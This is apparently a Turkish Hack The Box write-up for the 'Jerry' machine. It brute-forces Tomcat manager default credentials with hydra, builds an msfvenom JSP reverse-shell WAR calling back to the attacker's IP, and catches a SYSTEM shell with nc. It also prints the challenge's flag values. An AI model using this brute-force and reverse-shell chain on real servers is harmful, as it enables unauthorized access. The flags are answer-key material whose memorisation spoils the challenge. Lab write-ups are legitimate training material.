| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Jerry - HTB | Kolay | Windows |  |
Walkthrough
nmap taraması ile başlayalım.
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
|_http-server-header: Apache-Coyote/1.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
gobuster taramasında bir şey çıkmadı. Daha sonrasında tomcat için default credential'ları denemeye karar verdim. https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt adresinden user ve passwordleri indirdim python ile küçük bir kod yazıp bu wordlisti düzenledim.
┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# cat create.py
dosya = open("tomcat-betterdefaultpasslist.txt")
wordlist = dosya.read()
wordlist = wordlist.split("\n")
dosya.close()
username = []
password = []
for i in wordlist:
try:
username.append(i.split(":")[0])
password.append(i.split(":")[1])
except:
continue
dosya = open("username","a")
for i in username:
dosya.write(i+"\n")
dosya.close()
dosya = open("password","a")
for i in password:
dosya.write(i+"\n")
dosya.close()Şimdi hydra ile deneyelim.
┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# hydra -L username -P password 10.10.10.95 -s 8080 http-get /host-manager/html
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-03 08:27:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 6240 login tries (l:80/p:78), ~390 tries per task
[DATA] attacking http-get://10.10.10.95:8080/host-manager/html
[8080][http-get] host: 10.10.10.95 login: admin password: admin
[8080][http-get] host: 10.10.10.95 login: admin password: admin
[8080][http-get] host: 10.10.10.95 login: admin password: admin
[STATUS] 2627.00 tries/min, 2627 tries in 00:01h, 3613 to do in 00:02h, 16 active
[STATUS] 2106.00 tries/min, 4212 tries in 00:02h, 2028 to do in 00:01h, 16 active
[8080][http-get] host: 10.10.10.95 login: tomcat password: s3cret
[8080][http-get] host: 10.10.10.95 login: tomcat password: s3cret
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-03 08:30:36
İki adet kullanıcı tespit ettik. admin admin'le girdiğimde yetkilerim ksıtılıydı ancak tomcat scret ile girdiğimde dosya yükleyebildim.
Hemen bir war dosyası oluşturalım.
┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f war > shell.war
Payload size: 1086 bytes
Final size of war file: 1086 byteshttp://10.10.10.95:8080/manager/html/list
dosyasyı buradan yükledim ve daha sornasınde reverse aldım. http://10.10.10.95:8080/shell/
┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.95: inverse host lookup failed: Unknown host
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\systemFlagleri okuyalım.
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,576,569,856 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
İlk Yorumu Siz Yapın